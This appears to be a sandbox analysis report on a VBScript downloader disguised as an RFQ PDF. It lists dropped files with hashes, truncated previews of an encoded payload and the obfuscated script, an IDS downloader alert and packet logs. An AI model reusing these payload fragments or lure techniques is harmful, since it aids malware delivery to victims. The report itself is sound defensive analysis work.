                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD38.tmp.dmp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):175311
                                              Entropy (8bit):3.029085225706622
                                              Encrypted:false
                                              SSDEEP:768:HjR2O85d3YAsVBFnBpNNFWt0zE2vrvC6hkQKnffwz+HLTggjV6l87OkCx7+LHUaQ:9NbpN4uE2aOkho+LTgFkCCDUamfqUM8
                                              MD5:D38F7A9AE3C75BAA6069F764B576D081
                                              SHA1:2440776828D9788070C8BB32442B1F1656040F88
                                              SHA-256:6BB54C0D4C22A0FD97FDA86EDA3FE401805BD84850B7D9E661E6220AB6B69569
                                              SHA-512:27189C8597D7C3B4B269A7623A65B4C34387379444C7473C2EE07359CF38A5CC95A5166A19679408E78013B3B2504342201A4543FE94EDFD65B420F1AD448657
                                              Malicious:false
                                              Preview:MDMP..a..... ..........g........................<................T..........T.......8...........T............Y...S..........X(..........D*..............................................................................eJ.......*......GenuineIntel............T..............g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE81.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):6336
                                              Entropy (8bit):3.723142130973932
                                              Encrypted:false
                                              SSDEEP:96:RSIU6o7wVetbqY6iYJ4xuQE/Pfu5aM4Ur89bERsfyLRsm:R6l7wVeJqY6iYJ40Kprr89bERsfWsm
                                              MD5:1C0316EB67D3FFB03C36F5809730037E
                                              SHA1:BF2D9EC8947FE80663F93ACA73527EBE88AE72CD
                                              SHA-256:4CA7F17AC76335B356FD51DFF9444FC6AB8EC435EFA760288DC86C549F3E105E
                                              SHA-512:5C19308E801090233BFB252C0D32CB3AAF78C2591E5A4490D0B973AD5BBFAB9A71BB34E54D0904E95E62EAC4CC193BBDEC53640F9F6953BA033A49E1B9D16C67
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.9.2.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEA1.tmp.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4654
                                              Entropy (8bit):4.474186248713216
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zslJg77aI95eWpW8VYxPYm8M4JdjF9b+q85mxEFh/d:uIjf/I73f7VESJ1bzEFh/d
                                              MD5:D544C11565A68A3CABB7DA6429BA9F31
                                              SHA1:A85605967B0F4AD8C04320B314B5BC93F52DDEAB
                                              SHA-256:55280FF2CE4F98DF7898E2ABA34929C446A2E57A365D6E323F43C599B0CAB391
                                              SHA-512:0EDC440C4914DB2FE430E9DD3AD9177F611B98F35CB8862D9A417E6BF46B09B1B021F6675C986B9193BF3F93E62895C1ADD3A9B562387554CECC2862520A6359
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559246" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):11608
                                              Entropy (8bit):4.8908305915084105
                                              Encrypted:false
                                              SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                              MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                              SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                              SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                              SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                              Malicious:false
                                              Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:Nlllultnxj:NllU
                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                              Malicious:false
                                              Preview:@...e................................................@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkgx4jan.30z.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o42kqqmh.lxh.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxg54pp.rr4.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Solidifiable.Sch

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):433020
                                              Entropy (8bit):5.972239123671429
                                              Encrypted:false
                                              SSDEEP:6144:G8Ew64jfYfK/fSl36BSVDiUhDmS3/9jr7RMAhkTcRbDSCgxfDmaCAVUoxQJBdfgu:GMTwFl36BS74ipjh0cRbDAfDmn37dfx
                                              MD5:A26DAC9FF08728614EFD0BB7293E4B33
                                              SHA1:211357003BC276644F821FAAA60CA92687017CED
                                              SHA-256:7D729FCBE3387F6D741992A403615566577A68B4EC2DA2AB230F15DF4D4050BC
                                              SHA-512:48A887F50638607E12326C2B66D4F62FCDDEF4DF018033619E22515B9CA096EAF8A1630734A56B84A4E7B5093433776B56B8FD0001A2A0AD6027F66ADFD1115F
                                              Malicious:false
                                              Preview:cQGbcQGbu1pbEgDrAlhX6wKjEQNcJARxAZvrAjGBuWIxldzrAhOYcQGbgfGCHICV6wJrFXEBm4Hx4C0VSesC/cBxAZvrAqoO6wJnb7rHiqXucQGb6wKq+OsCdrrrAvZfMcrrAlAl6wLkbIkUC3EBm3EBm9Hi6wLkGesCWOaDwQTrAt1LcQGbgflm124BfMlxAZtxAZuLRCQEcQGb6wJ4z4nD6wI8++sC1gOBw/grOABxAZvrAny6um4UhinrAhBy6wLWlIHyFEeEdesCES3rAiF6gep6UwJccQGbcQGb6wJiu+sCYFHrAs/icQGbiwwQ6wKtlusCdeSJDBPrAlL3cQGbQusCsTFxAZuB+mx+BAB11OsCxcDrAs9/iVwkDOsCSkzrAtBLge0AAwAAcQGbcQGbi1QkCHEBm+sCx0+LfCQEcQGb6wJt5onr6wLEFXEBm4HDnAAAAHEBm+sC6qJT6wIfNXEBm2pA6wIYX+sCbuOJ6+sCK3/rAvvRx4MAAQAAAECEAesChaDrAtIngcMAAQAAcQGbcQGbU+sCHWVxAZuJ63EBm+sC9NuJuwQBAABxAZtxAZuBwwQBAABxAZvrAgBAU+sCkjRxAZtq/3EBm3EBm4PCBesCK+FxAZsx9nEBm+sCZW4xyXEBm+sC6KGLGusCzgXrAkkZQesC69xxAZs5HAp18+sC/lzrApWWRusCrclxAZuAfAr7uHXccQGb6wKmGotECvxxAZtxAZsp8OsCl3PrAhTI/9LrAqmI6wJiR7psfgQA6wLhtnEBmzHA6wJ5T+sCJ5aLfCQMcQGb6wIOhIE0B6YusJ7rAuQKcQGbg8AE6wLZ8nEBmznQdeRxAZvrArBRifvrAgOAcQGb/9frAruPcQGbTi6wnqZ1iEfA2XcXha5L2S/LMXJ8KeacJ+pqmvAs5RdDl9wI/wUxby7Fxv0n33TRp/0xd64cngVhar2ej9VtgSdavZ613icxIuQx6qsugOYxSzHqqy66

                                              Static File Info

                                              General

                                              File type:ASCII text, with CRLF line terminators
                                              Entropy (8bit):4.856034042243113
                                              TrID:
                                              • Visual Basic Script (13500/0) 100.00%
                                              File name:RFQ_24196MR_PDF.vbs
                                              File size:544'034 bytes
                                              MD5:474b9097fcb25c257bedf34672e6bb46
                                              SHA1:67ac04f1e475d3e7402ae654356076cc438dfcd5
                                              SHA256:bb1c7774dbafab1dcdf39f6513f622cb2c9c60324ef033189dd448973911bee6
                                              SHA512:686befa5fd11f2a92388aeda4ae27e1918b5190c441c5f71456a3e8b6a655f64694aeeab86b71a174ec6a6cfddd1cc21911e2dd3616603b6801007cfcbd5933e
                                              SSDEEP:6144:9y/7nXnC3gCY61hPCF1raixrflovpRLOMXfWJi3y1GJUFucXG/KsFhqIPeRK0CeD:W8fY6zm7+v7LOBJe+GPKgPegne1Y7g
                                              TLSH:13C43A65DD2856964D8B27EAFD545A85CAFC812E263300F5FED8034D900A8BCE3FD729
                                              File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-25T19:44:05.509680+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449739142.250.185.238443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 25, 2024 19:43:20.060492039 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.060547113 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.060637951 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.070158958 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.070175886 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.965236902 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.965425968 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.966253042 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.966315985 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.969924927 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:20.969938993 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.970235109 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:20.983414888 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:21.031332970 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:21.349710941 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:21.392951012 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:21.392965078 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:21.395824909 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:21.395900965 CEST44349730142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:21.395965099 CEST49730443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:25.481746912 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:25.481806040 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:25.481900930 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:25.482265949 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:25.482285023 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.606803894 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.606945038 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.607465029 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.607534885 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.608717918 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.608728886 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.608922958 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.609936953 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.655332088 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.985534906 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.986429930 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.986515999 CEST44349731142.250.185.238192.168.2.4
                                              Oct 25, 2024 19:43:26.986601114 CEST49731443192.168.2.4142.250.185.238
                                              Oct 25, 2024 19:43:26.987561941 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:26.987608910 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:26.987689972 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:26.987922907 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:26.987932920 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:27.856591940 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:27.856817961 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:27.859673023 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:27.859702110 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:27.859960079 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:27.861000061 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:27.907365084 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:29.980000973 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:29.980108023 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:29.988334894 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:29.988434076 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.096462965 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.096738100 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.096765041 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.102142096 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.102209091 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.102224112 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.106087923 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.106168985 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.106182098 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.115051031 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.115123987 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.115139008 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.124226093 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.124301910 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.124311924 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.124340057 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.124393940 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.132875919 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.141814947 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.141908884 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.141911983 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.141937971 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.141989946 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.216506958 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.216692924 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.216783047 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.216814041 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.217047930 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.217120886 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.217133999 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.219269991 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.219351053 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.219363928 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.232065916 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.232131004 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.232150078 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.232230902 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.232290983 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.232302904 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.241038084 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.241106987 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.241123915 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.250019073 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.250085115 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.250102043 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.258929014 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.258996964 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.259011030 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.299174070 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.299199104 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.346107960 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.606281996 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.606616020 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.606642008 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.606697083 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.606767893 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.606832027 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.607412100 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.607446909 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.607496023 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.607510090 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.608186960 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.608213902 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.608237982 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.608246088 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.608259916 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.608289957 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.609051943 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609081984 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609103918 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609111071 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.609123945 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609155893 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.609849930 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609873056 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609903097 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609918118 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.609930992 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.609966040 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.610733032 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.610754013 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.610806942 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.610821009 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.610889912 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.611538887 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.611574888 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.611624956 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.611638069 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.612302065 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.612361908 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:30.612374067 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.612703085 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:30.612728119 CEST44349732172.217.16.193192.168.2.4
